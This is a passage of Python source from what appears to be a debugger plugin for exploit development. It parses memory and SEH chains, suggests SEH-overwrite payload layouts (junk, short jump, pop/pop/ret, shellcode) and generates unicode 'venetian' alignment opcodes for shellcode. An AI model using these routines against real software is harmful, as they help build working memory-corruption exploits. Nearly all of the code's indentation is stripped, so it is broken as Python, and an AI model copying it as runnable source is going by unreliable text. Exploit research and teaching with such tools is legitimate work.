logfile.write("",thislog)
logfile.write("Results:",thislog)
logfile.write("--------",thislog)
encodedindex = []
fulllist_str = ""
fulllist_bin = ""
for i in encodedbytes:
encodedindex.append(i)
for i in encodedindex:
thisline = encodedbytes[i]
# 0 = bytes
# 1 = info
thislinebytes = "\\x" + "\\x".join(bin2hex(a) for a in thisline[0])
logline = " %s : %s : %s" % (thisline[0],thislinebytes,thisline[1])
if not silent:
dbg.log("%s" % logline)
logfile.write(logline,thislog)
fulllist_str += thislinebytes
fulllist_bin += thisline[0]
if not silent:
dbg.log("")
dbg.log("Full encoded string:")
dbg.log("--------------------")
dbg.log("%s" % fulllist_bin)
logfile.write("",thislog)
logfile.write("Full encoded string:",thislog)
logfile.write("--------------------",thislog)
logfile.write("%s" % fulllist_bin,thislog)
logfile.write("",thislog)
logfile.write("Full encoded hex:",thislog)
logfile.write("-----------------",thislog)
logfile.write("%s" % fulllist_str,thislog)
return
def procString(args):
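    """
    Read (-r) or write (-w) an ascii or unicode (-u) string at a given address (-a)
    """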
mode = ""
useunicode = False
terminatestring = True
addy = 0
regs = dbg.getRegs()
stringtowrite = ""
# read or write ?
if not "r" in args and not "w" in args:
dbg.log("*** Error: you must indicate if you want to read (-r) or write (-w) ***",highlight=True)
return
addresserror = False
if not "a" in args:
addresserror = True
else:
if type(args["a"]).__name__.lower() != "bool":
# check if it's a register or not
if str(args["a"]).upper() in regs:
addy = regs[str(args["a"].upper())]
else:
addy = int(args["a"],16)
else:
addresserror = True
if addresserror:
dbg.log("*** Error: you must specify a valid address with -a ***",highlight=True)
return
if "w" in args:
mode = "write"
if "r" in args:
# read wins, because it's non destructive
mode = "read"
if "u" in args:
useunicode = True
stringerror = False
if "w" in args and not "s" in args:
stringerror = True
if "s" in args:
if type(args["s"]).__name__.lower() != "bool":
stringtowrite = args["s"]
else:
stringerror = True
if "noterminate" in args:
terminatestring = False
if stringerror:
dbg.log("*** Error: you must specify a valid string with -s ***",highlight=True)
return
if mode == "read":
stringinmemory = ""
extra = " "
try:
if not useunicode:
stringinmemory = dbg.readString(addy)
else:
stringinmemory = dbg.readWString(addy)
extra = " (unicode) "
dbg.log("String%sat 0x%08x:" % (extra,addy))
dbg.log("%s" % stringinmemory)
except:
dbg.log("Unable to read string at 0x%08x" % addy)
if mode == "write":
origstring = stringtowrite
writtendata = ""
try:
if not useunicode:
if terminatestring:
stringtowrite += "\x00"
byteswritten = ""
for c in stringtowrite:
byteswritten += " %s" % bin2hex(c)
dbg.writeMemory(addy,stringtowrite)
writtendata = dbg.readString(addy)
dbg.log("Wrote string (%d bytes) to 0x%08x:" % (len(stringtowrite),addy))
dbg.log("%s" % byteswritten)
else:
newstring = ""
for c in stringtowrite:
newstring += "%s%s" % (c,"\x00")
if terminatestring:
newstring += "\x00\x00"
dbg.writeMemory(addy,newstring)
dbg.log("Wrote unicode string (%d bytes) to 0x%08x" % (len(newstring),addy))
writtendata = dbg.readWString(addy)
byteswritten = ""
for c in newstring:
byteswritten += " %s" % bin2hex(c)
dbg.log("%s" % byteswritten)
if not writtendata.startswith(origstring):
dbg.log("Write operation succeeded, but the string in memory doesn't appear to be there",highlight=True)
except:
dbg.log("Unable to write the string to 0x%08x" % addy)
dbg.logLines(traceback.format_exc(),highlight=True)
return
def procKb(args):
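    """
    Manage the knowledgebase : -list IDs or their entries, -set a value for an ID,
    or -del an ID (or a single object inside an ID)
    """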
validcommands = ['set','list','del']
validcommandfound = False
selectedcommand = ""
selectedid = ""
selectedvalue = ""
for command in validcommands:
if command in args:
validcommandfound = True
selectedcommand = command
break
dbg.log("")
if not validcommandfound:
dbg.log("*** Please specify a valid command. Valid commands are :")
for command in validcommands:
dbg.log(" -%s" % command)
return
if "id" in args:
if type(args["id"]).__name__.lower() != "bool":
selectedid = args["id"]
if "value" in args:
if type(args["value"]).__name__.lower() != "bool":
selectedvalue = args["value"]
dbg.log("Knowledgebase database : %s" % dbg.getKBDB())
kb = dbg.listKnowledge()
if selectedcommand == "list":
dbg.log("Number of IDs in Knowledgebase : %d" % len(kb))
if len(kb) > 0:
if selectedid == "":
dbg.log("IDs :")
dbg.log("-----")
for kbid in kb:
dbg.log(kbid)
else:
if selectedid in kb:
kbid = dbg.getKnowledge(selectedid)
kbtype = kbid.__class__.__name__
kbtitle = "Entries for ID %s (type %s) :" % (selectedid,kbtype)
dbg.log(kbtitle)
dbg.log("-" * (len(kbtitle)+2))
if selectedvalue != "":
dbg.log(" (Filter : %s)" % selectedvalue)
nrentries = 0
if kbtype == "dict":
for dictkey in kbid:
if selectedvalue == "" or selectedvalue in dictkey:
logline = ""
                        if kbid[dictkey].__class__.__name__ == "int" or kbid[dictkey].__class__.__name__ == "long":
logline = " %s : %d (0x%x)" % (str(dictkey),kbid[dictkey],kbid[dictkey])
else:
logline = " %s : %s" % (str(dictkey),kbid[dictkey])
dbg.log(logline)
nrentries += 1
if kbtype == "list":
cnt = 0
for entry in kbid:
                    dbg.log(" %d : %s" % (cnt,entry))
cnt += 1
nrentries += 1
if kbtype == "str":
dbg.log(" %s" % kbid)
nrentries += 1
if kbtype == "int" or kbtype == "long":
dbg.log(" %d (0x%08x)" % (kbid,kbid))
nrentries += 1
dbg.log("")
filtertxt = ""
if selectedvalue != "":
filtertxt="filtered "
dbg.log("Number of %sentries for ID %s : %d" % (filtertxt,selectedid,nrentries))
else:
dbg.log("ID %s was not found in the Knowledgebase" % selectedid)
if selectedcommand == "set":
# we need an ID and a value argument
if selectedid == "":
dbg.log("*** Please enter a valid ID with -id",highlight=1)
return
if selectedvalue == "":
dbg.log("*** Please enter a valid value",highlight=1)
return
if selectedid in kb:
# vtableCache
if selectedid == "vtableCache":
                # split on comma
valueparts = selectedvalue.split(",")
if len(valueparts) == 2:
vtablename = valueparts[0].strip(" ")
vtablevalue = 0
if "0x" in valueparts[1].lower():
vtablevalue = int(valueparts[1],16)
else:
vtablevalue = int(valueparts[1])
kbadd = {}
kbadd[vtablename] = vtablevalue
dbg.addKnowledge(selectedid,kbadd)
else:
dbg.log("*** Please provide a valid value for -value")
                    dbg.log("*** KB %s contains a list, please use a comma" % selectedid)
dbg.log("*** to separate entries. First entry should be a string,")
dbg.log("*** Second entry should be an integer.")
return
else:
dbg.addKnowledge(selectedid,selectedvalue)
dbg.log(" ")
dbg.log("ID %s updated." % selectedid)
else:
dbg.log("ID %s was not found in the Knowledgebase" % selectedid)
if selectedcommand == "del":
if selectedid == "" or selectedid not in kb:
dbg.log("*** Please enter a valid ID with -id",highlight=1)
return
else:
dbg.forgetKnowledge(selectedid,selectedvalue)
if selectedvalue == "":
dbg.log("*** Entire ID %s removed from Knowledgebase" % selectedid)
else:
dbg.log("*** Object %s in ID %s removed from Knowledgebase" % (selectedvalue,selectedid))
return
def procBPSeh(self):
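    """
    Set a breakpoint on each handler in the current SEH chain
    """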
sehchain = dbg.getSehChain()
dbg.log("Nr of SEH records : %d" % len(sehchain))
if len(sehchain) > 0:
dbg.log("SEH Chain :")
dbg.log("-----------")
dbg.log("Address Next SEH Handler")
for sehrecord in sehchain:
address = sehrecord[0]
sehandler = sehrecord[1]
nseh = ""
try:
nsehvalue = struct.unpack('<L',dbg.readMemory(address,4))[0]
nseh = "0x%08x" % nsehvalue
except:
nseh = "0x????????"
bpsuccess = True
try:
if __DEBUGGERAPP__ == "WinDBG":
bpsuccess = dbg.setBreakpoint(sehandler)
else:
dbg.setBreakpoint(sehandler)
bpsuccess = True
except:
bpsuccess = False
bptext = ""
if not bpsuccess:
bptext = "BP failed"
else:
bptext = "BP set"
ptr = MnPointer(sehandler)
funcinfo = ptr.getPtrFunction()
dbg.log("0x%08x %s 0x%08x %s <- %s" % (address,nseh,sehandler,funcinfo,bptext))
dbg.log("")
return "Done"
def procSehChain(self):
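    """
    Show the current SEH chain, mark records that appear to be smashed by a cyclic pattern
    and suggest a payload layout for each overwritten record
    """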
sehchain = dbg.getSehChain()
dbg.log("Nr of SEH records : %d" % len(sehchain))
handlersoverwritten = {}
if len(sehchain) > 0:
dbg.log("Start of chain (TEB FS:[0]) : 0x%08x" % sehchain[0][0])
dbg.log("Address Next SEH Handler")
dbg.log("------- -------- -------")
for sehrecord in sehchain:
recaddress = sehrecord[0]
sehandler = sehrecord[1]
nseh = ""
try:
nsehvalue = struct.unpack('<L',dbg.readMemory(recaddress,4))[0]
nseh = "0x%08x" % nsehvalue
except:
nseh = 0
sehandler = 0
overwritedata = checkSEHOverwrite(recaddress,nseh,sehandler)
overwritemark = ""
funcinfo = ""
if sehandler > 0:
ptr = MnPointer(sehandler)
funcinfo = ptr.getPtrFunction()
else:
funcinfo = " (corrupted record)"
if str(nseh).startswith("0x"):
nseh = "0x%08x" % int(nseh,16)
else:
nseh = "0x%08x" % int(nseh)
if len(overwritedata) > 0:
handlersoverwritten[recaddress] = overwritedata
smashoffset = int(overwritedata[1])
typeinfo = ""
if overwritedata[0] == "unicode":
smashoffset += 2
typeinfo = " [unicode]"
overwritemark = " (record smashed at offset %d%s)" % (smashoffset,typeinfo)
dbg.log("0x%08x %s 0x%08x %s%s" % (recaddress,nseh,sehandler,funcinfo, overwritemark), recaddress)
if len(handlersoverwritten) > 0:
dbg.log("")
dbg.log("Payload structure suggestion(s):")
for overwrittenhandler in handlersoverwritten:
overwrittendata = handlersoverwritten[overwrittenhandler]
overwrittentype = overwrittendata[0]
overwrittenoffset = int(overwrittendata[1])
if not overwrittentype == "unicode":
dbg.log("[Junk * %d]['\\xeb\\x06\\x41\\x41'][p/p/r][shellcode][more junk if needed]" % (overwrittenoffset))
else:
overwrittenoffset += 2
dbg.log("[Junk * %d][nseh - walkover][unicode p/p/r][venetian alignment][shellcode][more junk if needed]" % overwrittenoffset)
return
def procDumpLog(args):
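# Parse an alloc()/free() logfile (-f), keep the chunks that were allocated but never freed, and dump each surviving object to dump_alloc_free.txt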
logfile = ""
levels = 0
nestedsize = 0x28
if "f" in args:
if type(args["f"]).__name__.lower() != "bool":
logfile = args["f"]
if "l" in args:
if type(args["l"]).__name__.lower() != "bool":
if str(args["l"]).lower().startswith("0x"):
try:
levels = int(args["l"],16)
except:
levels = 0
else:
try:
levels = int(args["l"])
except:
levels = 0
if "m" in args:
if type(args["m"]).__name__.lower() != "bool":
if str(args["m"]).lower().startswith("0x"):
try:
nestedsize = int(args["m"],16)
except:
nestedsize = 0x28
else:
try:
nestedsize = int(args["m"])
except:
nestedsize = 0x28
if logfile == "":
dbg.log(" *** Error: please specify a valid logfile with argument -f ***",highlight=1)
return
allocs = 0
frees = 0
# open logfile and record all objects & sizes
logdata = {}
try:
dbg.log("[+] Parsing logfile %s" % logfile)
f = open(logfile,"rb")
contents = f.readlines()
f.close()
for tline in contents:
line = str(tline)
if line.startswith("alloc("):
size = ""
addy = ""
lineparts = line.split("(")
if len(lineparts) > 1:
sizeparts = lineparts[1].split(")")
size = sizeparts[0].replace(" ","")
lineparts = line.split("=")
if len(lineparts) > 1:
linepartaddy = lineparts[1].split(" ")
for lpa in linepartaddy:
if addy != "":
break
if lpa != "":
addy = lpa
if size != "" and addy != "":
size = size.lower()
addy = addy.lower()
if not addy in logdata:
logdata[addy] = size
allocs += 1
if line.startswith("free("):
addy = ""
lineparts = line.split("(")
if len(lineparts) > 1:
addyparts = lineparts[1].split(")")
addy = addyparts[0].replace(" ","")
if addy != "":
addy = addy.lower()
if addy in logdata:
del logdata[addy]
frees += 1
dbg.log("[+] Logfile parsed, %d objects found" % len(logdata))
dbg.log(" Total allocs: %d, total free: %d" % (allocs,frees))
dbg.log("[+] Dumping objects")
logfile = MnLog("dump_alloc_free.txt")
thislog = logfile.reset()
for addy in logdata:
asize = logdata[addy]
ptrx = MnPointer(int(addy,16))
size = int(asize,16)
dumpdata = ptrx.dumpObjectAtLocation(size,levels,nestedsize,thislog,logfile)
except:
dbg.log(" *** Unable to open logfile %s ***" % logfile,highlight=1)
dbg.log(traceback.format_exc())
return
return
def procDumpObj(args):
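# Dump the object at address -a; when no size (-s) is given, try to derive it from the heap chunk the address belongs to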
addy = 0
levels = 0
size = 0
nestedsize = 0x28
regs = dbg.getRegs()
if "a" in args:
if type(args["a"]).__name__.lower() != "bool":
addy,addyok = getAddyArg(args["a"])
if "s" in args:
if type(args["s"]).__name__.lower() != "bool":
if str(args["s"]).lower().startswith("0x"):
try:
size = int(args["s"],16)
except:
size = 0
else:
try:
size = int(args["s"])
except:
size = 0
if "l" in args:
if type(args["l"]).__name__.lower() != "bool":
if str(args["l"]).lower().startswith("0x"):
try:
levels = int(args["l"],16)
except:
levels = 0
else:
try:
levels = int(args["l"])
except:
levels = 0
if "m" in args:
if type(args["m"]).__name__.lower() != "bool":
if str(args["m"]).lower().startswith("0x"):
try:
nestedsize = int(args["m"],16)
except:
nestedsize = 0
else:
try:
nestedsize = int(args["m"])
except:
nestedsize = 0
errorsfound = False
if addy == 0:
errorsfound = True
dbg.log("*** Please specify a valid address to argument -a ***",highlight=1)
else:
ptrx = MnPointer(addy)
osize = size
if size == 0:
# no size specified
if addy > 0:
dbg.log("[+] No size specified, checking if address is part of known heap chunk")
if ptrx.isInHeap():
heapinfo = ptrx.getHeapInfo()
heapaddy = heapinfo[0]
chunkobj = heapinfo[3]
if not heapaddy == None:
if heapaddy > 0:
chunkaddy = chunkobj.chunkptr
size = chunkobj.usersize
dbg.log(" Address found in chunk 0x%08x, heap 0x%08x, (user)size 0x%02x" % (chunkaddy, heapaddy, size))
addy = chunkobj.userptr
if size > 0xfff:
dbg.log(" I'll only dump 0xfff bytes from the object, for performance reasons")
size = 0xfff
if size > 0xfff and osize > 0:
errorsfound = True
dbg.log("*** Please keep the size below 0xfff (argument -s) ***",highlight=1)
if size == 0:
size = 0x28
if levels > 0 and nestedsize == 0:
errorsfound = True
dbg.log("*** Please specify a valid size to argument -m ***",highlight=1)
if not errorsfound:
ptrx = MnPointer(addy)
dumpdata = ptrx.dumpObjectAtLocation(size,levels,nestedsize)
return
# routine to copy bytes from one location to another
def procCopy(args):
src = 0
dst = 0
nrbytes = 0
regs = dbg.getRegs()
if "src" in args:
if type(args["src"]).__name__.lower() != "bool":
src,addyok = getAddyArg(args["src"])
if "dst" in args:
if type(args["dst"]).__name__.lower() != "bool":
dst,addyok = getAddyArg(args["dst"])
if "n" in args:
if type(args["n"]).__name__.lower() != "bool":
if "+" in str(args['n']) or "-" in str(args['n']):
nrbytes,bytesok = getAddyArg(args['n'])
if not bytesok:
nrbytes = 0 # invalid expression; the nrbytes == 0 check below will report the error
else:
if str(args['n']).lower().startswith("0x"):
try:
nrbytes = int(args["n"],16)
except:
nrbytes = 0
else:
try:
nrbytes = int(args["n"])
except:
nrbytes = 0
errorsfound = False
if src == 0:
errorsfound = True
dbg.log("*** Please specify a valid source address to argument -src ***",highlight=1)
if dst == 0:
errorsfound = True
dbg.log("*** Please specify a valid destination address to argument -dst ***",highlight=1)
if nrbytes == 0:
errorsfound = True
dbg.log("*** Please specify a valid number of bytes to argument -n ***",highlight=1)
if not errorsfound:
dbg.log("[+] Attempting to copy 0x%08x bytes from 0x%08x to 0x%08x" % (nrbytes, src, dst))
sourcebytes = dbg.readMemory(src,nrbytes)
try:
dbg.writeMemory(dst,sourcebytes)
dbg.log(" Done.")
except:
dbg.log(" *** Copy failed, check if both locations are accessible/mapped",highlight=1)
return
# unicode alignment routines written by floyd (http://www.floyd.ch, twitter: @floyd_ch)
def procUnicodeAlign(args):
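# Build venetian (unicode) alignment code: -a = address where the alignment code will start, -b = register that will receive the buffer address, -l = compensate for a leading null byte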
leaks = False
address = 0
alignresults = {}
bufferRegister = "eax" #we will put ebp into the buffer register
timeToRun = 15
registers = {"eax":0, "ebx":0, "ecx":0, "edx":0, "esp":0, "ebp":0,}
showerror = False
regs = dbg.getRegs()
if "l" in args:
leaks = True
if "a" in args:
if type(args["a"]).__name__.lower() != "bool":
address,addyok = getAddyArg(args["a"])
else:
address = regs["EIP"]
if leaks:
address += 1
if address == 0:
dbg.log("Please enter a valid address with argument -a",highlight=1)
dbg.log("This address must be the location where the alignment code will be placed/start")
dbg.log("(without leaking zero byte). Don't worry, the script will only use")
dbg.log("it to calculate the offset from the address to EBP.")
showerror=True
if "b" in args:
if args["b"].lower().strip() == "eax":
bufferRegister = 'eax'
elif args["b"].lower().strip() == "ebx":
bufferRegister = 'ebx'
elif args["b"].lower().strip() == "ecx":
bufferRegister = 'ecx'
elif args["b"].lower().strip() == "edx":
bufferRegister = 'edx'
else:
dbg.log("Please enter a valid register with argument -b")
dbg.log("Valid registers are: eax, ebx, ecx, edx")
showerror = True
if "t" in args and args["t"] != "":
try:
timeToRun = int(args["t"])
if timeToRun < 0:
timeToRun = timeToRun * (-1)
except:
dbg.log("Please enter a valid integer for -t",highlight=1)
showerror=True
if "ebp" in args and args["ebp"] != "":
try:
registers["ebp"] = int(args["ebp"],16)
except:
dbg.log("Please enter a valid value for ebp",highlight=1)
showerror=True
dbg.log("[+] Start address for venetian alignment routine: 0x%08x" % address)
dbg.log("[+] Will prepend alignment with null byte compensation? %s" % str(leaks).lower())
# ebp must be writeable for this routine to work
value_of_ebp = regs["EBP"]
dbg.log("[+] Checking if ebp (0x%08x) is writeable" % value_of_ebp)
ebpaccess = getPointerAccess(value_of_ebp)
if not "WRITE" in ebpaccess:
dbg.log("[!] Warning! ebp does not appear to be writeable!",highlight = 1)
dbg.log(" You will have to run some custom instructions first to make ebp writeable")
dbg.log(" and at that point, run this mona command again.")
dbg.log(" Hints: maybe you can pop something off the stack into ebp,")
dbg.log(" or push esp and pop it into ebp.")
showerror = True
else:
dbg.log(" OK (%s)" % ebpaccess)
if not showerror:
alignresults = prepareAlignment(leaks, address, bufferRegister, timeToRun, registers)
# write results to file
if len(alignresults) > 0:
if not silent:
dbg.log("[+] Alignment generator finished, %d results" % len(alignresults))
logfile = MnLog("venetian_alignment.txt")
thislog = logfile.reset()
for resultnr in alignresults:
resulttitle = "Alignment routine %d:" % resultnr
logfile.write(resulttitle,thislog)
logfile.write("-" * len(resulttitle),thislog)
theseresults = alignresults[resultnr]
for resultinstructions in theseresults:
logfile.write("Instructions:",thislog)
resultlines = resultinstructions.split(";")
for resultline in resultlines:
logfile.write(" %s" % resultline.strip(),thislog)
logfile.write("Hex:",thislog)
logfile.write("'%s'" % theseresults[resultinstructions],thislog)
logfile.write("",thislog)
return alignresults
def prepareAlignment(leaks, address, bufferRegister, timeToRun, registers):
def getRegister(registerName):
registerName = registerName.upper()
regs = dbg.getRegs()
if registerName in regs:
return regs[registerName]
def calculateNewXregister(x,h,l):
return ((x>>16)<<16)+(h<<8)+l
prefix = ""
postfix = ""
additionalLength = 0 #Length of the prefix+postfix instructions in after-unicode-conversion bytes
code_to_get_rid_of_zeros = "add [ebp],ch; " #\x6d --> \x00\x6d\x00
buf_sig = bufferRegister[1]
registers_to_fill = ["ah", "al", "bh", "bl", "ch", "cl", "dh", "dl"] #important: h's first!
registers_to_fill.remove(buf_sig+"h")
registers_to_fill.remove(buf_sig+"l")
leadingZero = leaks
for name in registers:
if not registers[name]:
registers[name] = getRegister(name)
#256 values with only 8276 instructions (bruteforced), best found so far:
#values_to_generate_all_255_values = [71, 87, 15, 251, 162, 185]
#but to be on the safe side, let's take only A-Za-z values (in 8669 instructions):
values_to_generate_all_255_values = [86, 85, 75, 109, 121, 99]
new_values = zip(registers_to_fill, values_to_generate_all_255_values)
if leadingZero:
prefix += code_to_get_rid_of_zeros
additionalLength += 2
leadingZero = False
#prefix += "mov bl,0; mov bh,0; mov cl,0; mov ch,0; mov dl,0; mov dh,0; "
#additionalLength += 12
for name, value in zip(registers_to_fill, values_to_generate_all_255_values):
padding = ""
if value < 16:
padding = "0"
if "h" in name:
prefix += "mov e%sx,0x4100%s%s00; " % (name[0], padding, hex(value)[2:])
prefix += "add [ebp],ch; "
additionalLength += 8
if "l" in name:
prefix += "mov e%sx,0x4100%s%s00; " % (buf_sig, padding, hex(value)[2:])
prefix += "add %s,%sh; " % (name, buf_sig)
prefix += "add [ebp],ch; "
additionalLength += 10
leadingZero = False
new_values_dict = dict(new_values)
for new in registers_to_fill[::2]:
n = new[0]
registers['e%sx'%n] = calculateNewXregister(registers['e%sx'%n], new_values_dict['%sh'%n], new_values_dict['%sl'%n])
if leadingZero:
prefix += code_to_get_rid_of_zeros
additionalLength += 2
leadingZero = False
#Let's push the value of ebp into the BufferRegister
prefix += "push ebp; %spop %s; " % (code_to_get_rid_of_zeros, bufferRegister)
leadingZero = True
additionalLength += 6
registers[bufferRegister] = registers["ebp"]
if not leadingZero:
#We need a leading zero for the ADD operations
prefix += "push ebp; " #something 1 byte, doesn't matter what
leadingZero = True
additionalLength += 2
#The last ADD command will leak another zero to the next instruction
#Therefore append (postfix) a last instruction to get rid of it
#so the shellcode is nicely aligned
postfix += code_to_get_rid_of_zeros
additionalLength += 2
alignresults = generateAlignment(address, bufferRegister, registers, timeToRun, prefix, postfix, additionalLength)
return alignresults
def generateAlignment(alignment_code_loc, bufferRegister, registers, timeToRun, prefix, postfix, additionalLength):
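# Randomised search (for at most timeToRun seconds) for a sequence of 'add <high/low byte>,<reg8>' instructions that makes the BufferRegister point at the alignment code location; every improvement found is logged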
import copy, random, time
alignresults = {}
def sanitiseZeros(originals, names):
for index, i in enumerate(originals):
if i == 0:
warn("Your %s register is zero. That's bad for the heuristic." % names[index])
warn("In general this means there will be no result or they consist of more bytes.")
def checkDuplicates(originals, names):
duplicates = len(originals) - len(set(originals))
if duplicates > 0:
warn("""Some of the 2 byte registers seem to be the same. There is/are %i duplicate(s):""" % duplicates)
warn("In general this means there will be no result or they consist of more bytes.")
warn(", ".join(names))
warn(", ".join(hexlist(originals)))
def checkHigherByteBufferRegisterForOverflow(g1, name, g2):
overflowDanger = 0x100-g1
max_instructions = overflowDanger*256-g2
if overflowDanger <= 3:
warn("Your BufferRegister's %s register value starts pretty high (%s) and might overflow." % (name, hex(g1)))
warn("Therefore we only look for solutions with less than %i bytes (%s%s until overflow)." % (max_instructions, hex(g1), hex(g2)[2:]))
warn("This makes our search space smaller, meaning it's harder to find a solution.")
return max_instructions
def randomise(values, maxValues):
for index, i in enumerate(values):
if random.random() <= MAGIC_PROBABILITY_OF_ADDING_AN_ELEMENT_FROM_INPUTS:
values[index] += 1
values[index] = values[index] % maxValues[index]
def check(as1, index_for_higher_byte, ss, gs, xs, ys, M, best_result):
g1, g2 = gs
s1, s2 = ss
sum_of_instructions = 2*sum(xs) + 2*sum(ys) + M
if best_result > sum_of_instructions:
res0 = s1
res1 = s2
for index, _ in enumerate(as1):
res0 += as1[index]*xs[index] % 256
res0 = res0 - ((g2+sum_of_instructions)/256)
as2 = copy.copy(as1)
as2[index_for_higher_byte] = (g1 + ((g2+sum_of_instructions)/256)) % 256
for index, _ in enumerate(as2):
res1 += as2[index]*ys[index] % 256
res1 = res1 - sum_of_instructions
if g1 == res0 % 256 and g2 == res1 % 256:
return sum_of_instructions
return 0
def printNicely(names, buffer_registers_4_byte_names, xs, ys, additionalLength=0, prefix="", postfix=""):
thisresult = {}
resulting_string = prefix
sum_bytes = 0
for index, x in enumerate(xs):
for k in range(0, x):
resulting_string += "add "+buffer_registers_4_byte_names[0]+","+names[index]+"; "
sum_bytes += 2
for index, y in enumerate(ys):
for k in range(y):
resulting_string += "add "+buffer_registers_4_byte_names[1]+","+names[index]+"; "
sum_bytes += 2
resulting_string += postfix
sum_bytes += additionalLength
if not silent:
info("[+] %i resulting bytes (%i bytes injection) of Unicode code alignment. Instructions:"%(sum_bytes,sum_bytes/2))
info(" ", resulting_string)
hex_string = metasm(resulting_string)
if not silent:
info(" Unicode safe opcodes without zero bytes:")
info(" ", hex_string)
thisresult[resulting_string] = hex_string
return thisresult
def metasm(inputInstr):
#the immunity and metasm assembly differ a lot:
#immunity add [ebp],ch "\x00\xad\x00\x00\x00\x00"
#metasm add [ebp],ch "\x00\x6d\x00" --> we want this!
#Therefore implementing our own "metasm" mapping here
#same problem for things like mov eax,0x41004300
ass_operation = {'add [ebp],ch': '\\x00\\x6d\\x00', 'pop ebp': ']', 'pop edx': 'Z', 'pop ecx': 'Y', 'push ecx': 'Q',
'pop ebx': '[', 'push ebx': 'S', 'pop eax': 'X', 'push eax': 'P', 'push esp': 'T', 'push ebp': 'U',
'push edx': 'R', 'pop esp': '\\', 'add dl,bh': '\\x00\\xfa', 'add dl,dh': '\\x00\\xf2',
'add dl,ah': '\\x00\\xe2', 'add ah,al': '\\x00\\xc4', 'add ah,ah': '\\x00\\xe4', 'add ch,bl': '\\x00\\xdd',
'add ah,cl': '\\x00\\xcc', 'add bl,ah': '\\x00\\xe3', 'add bh,dh': '\\x00\\xf7', 'add bl,cl': '\\x00\\xcb',
'add ah,ch': '\\x00\\xec', 'add bl,al': '\\x00\\xc3', 'add bh,dl': '\\x00\\xd7', 'add bl,ch': '\\x00\\xeb',
'add dl,cl': '\\x00\\xca', 'add dl,bl': '\\x00\\xda', 'add al,ah': '\\x00\\xe0', 'add bh,ch': '\\x00\\xef',
'add al,al': '\\x00\\xc0', 'add bh,cl': '\\x00\\xcf', 'add al,ch': '\\x00\\xe8', 'add dh,bl': '\\x00\\xde',
'add ch,ch': '\\x00\\xed', 'add cl,dl': '\\x00\\xd1', 'add al,cl': '\\x00\\xc8', 'add dh,bh': '\\x00\\xfe',
'add ch,cl': '\\x00\\xcd', 'add cl,dh': '\\x00\\xf1', 'add ch,ah': '\\x00\\xe5', 'add cl,bl': '\\x00\\xd9',
'add dh,al': '\\x00\\xc6', 'add ch,al': '\\x00\\xc5', 'add cl,bh': '\\x00\\xf9', 'add dh,ah': '\\x00\\xe6',
'add dl,dl': '\\x00\\xd2', 'add dh,cl': '\\x00\\xce', 'add dh,dl': '\\x00\\xd6', 'add ah,dh': '\\x00\\xf4',
'add dh,dh': '\\x00\\xf6', 'add ah,dl': '\\x00\\xd4', 'add ah,bh': '\\x00\\xfc', 'add ah,bl': '\\x00\\xdc',
'add bl,bh': '\\x00\\xfb', 'add bh,al': '\\x00\\xc7', 'add bl,dl': '\\x00\\xd3', 'add bl,bl': '\\x00\\xdb',
'add bh,ah': '\\x00\\xe7', 'add bl,dh': '\\x00\\xf3', 'add bh,bl': '\\x00\\xdf', 'add al,bl': '\\x00\\xd8',
'add bh,bh': '\\x00\\xff', 'add al,bh': '\\x00\\xf8', 'add al,dl': '\\x00\\xd0', 'add dl,ch': '\\x00\\xea',
'add dl,al': '\\x00\\xc2', 'add al,dh': '\\x00\\xf0', 'add cl,cl': '\\x00\\xc9', 'add cl,ch': '\\x00\\xe9',
'add ch,bh': '\\x00\\xfd', 'add cl,al': '\\x00\\xc1', 'add ch,dh': '\\x00\\xf5', 'add cl,ah': '\\x00\\xe1',
'add dh,ch': '\\x00\\xee', 'add ch,dl': '\\x00\\xd5', 'add ch,ah': '\\x00\\xe5', 'mov dh,0': '\\xb6\\x00',
'add dl,ah': '\\x00\\xe2', 'mov dl,0': '\\xb2\\x00', 'mov ch,0': '\\xb5\\x00', 'mov cl,0': '\\xb1\\x00',
'mov bh,0': '\\xb7\\x00', 'add bl,ah': '\\x00\\xe3', 'mov bl,0': '\\xb3\\x00', 'add dh,ah': '\\x00\\xe6',
'add cl,ah': '\\x00\\xe1', 'add bh,ah': '\\x00\\xe7'}
for example_instr, example_op in [("mov eax,0x41004300", "\\xb8\\x00\\x43\\x00\\x41"),
("mov ebx,0x4100af00", "\\xbb\\x00\\xaf\\x00\\x41"),
("mov ecx,0x41004300", "\\xb9\\x00\\x43\\x00\\x41"),
("mov edx,0x41004300", "\\xba\\x00\\x43\\x00\\x41")]:
for i in range(0,256):
padding =""
if i < 16:
padding = "0"
new_instr = example_instr[:14]+padding+hex(i)[2:]+example_instr[16:]
new_op = example_op[:10]+padding+hex(i)[2:]+example_op[12:]
ass_operation[new_instr] = new_op
res = ""
for instr in inputInstr.split("; "):
if instr in ass_operation:
res += ass_operation[instr].replace("\\x00","")
elif instr.strip():
warn(" Couldn't find metasm assembly for %s" % str(instr))
warn(" You have to manually convert it in the metasm shell")
res += "<"+instr+">"
return res
def getCyclic(originals):
cyclic = [0 for i in range(0,len(originals))]
for index, orig_num in enumerate(originals):
cycle = 1
num = orig_num
while True:
cycle += 1
num += orig_num
num = num % 256
if num == orig_num:
cyclic[index] = cycle
break
return cyclic
def hexlist(lis):
return [hex(i) for i in lis]
def theX(num):
res = (num>>16)<<16 ^ num
return res
def higher(num):
res = num>>8
return res
def lower(num):
res = ((num>>8)<<8) ^ num
return res
def info(*text):
dbg.log(" ".join(str(i) for i in text))
def warn(*text):
dbg.log(" ".join(str(i) for i in text), highlight=1)
def debug(*text):
if False:
dbg.log(" ".join(str(i) for i in text))
buffer_registers_4_byte_names = [bufferRegister[1]+"h", bufferRegister[1]+"l"]
buffer_registers_4_byte_value = theX(registers[bufferRegister])
MAGIC_PROBABILITY_OF_ADDING_AN_ELEMENT_FROM_INPUTS=0.25
MAGIC_PROBABILITY_OF_RESETTING=0.04
MAGIC_MAX_PROBABILITY_OF_RESETTING=0.11
originals = []
ax = theX(registers["eax"])
ah = higher(ax)
al = lower(ax)
bx = theX(registers["ebx"])
bh = higher(bx)
bl = lower(bx)
cx = theX(registers["ecx"])
ch = higher(cx)
cl = lower(cx)
dx = theX(registers["edx"])
dh = higher(dx)
dl = lower(dx)
start_address = theX(buffer_registers_4_byte_value)
s1 = higher(start_address)
s2 = lower(start_address)
alignment_code_loc_address = theX(alignment_code_loc)
g1 = higher(alignment_code_loc_address)
g2 = lower(alignment_code_loc_address)
names = ['ah', 'al', 'bh', 'bl', 'ch', 'cl', 'dh', 'dl']
originals = [ah, al, bh, bl, ch, cl, dh, dl]
sanitiseZeros(originals, names)
checkDuplicates(originals, names)
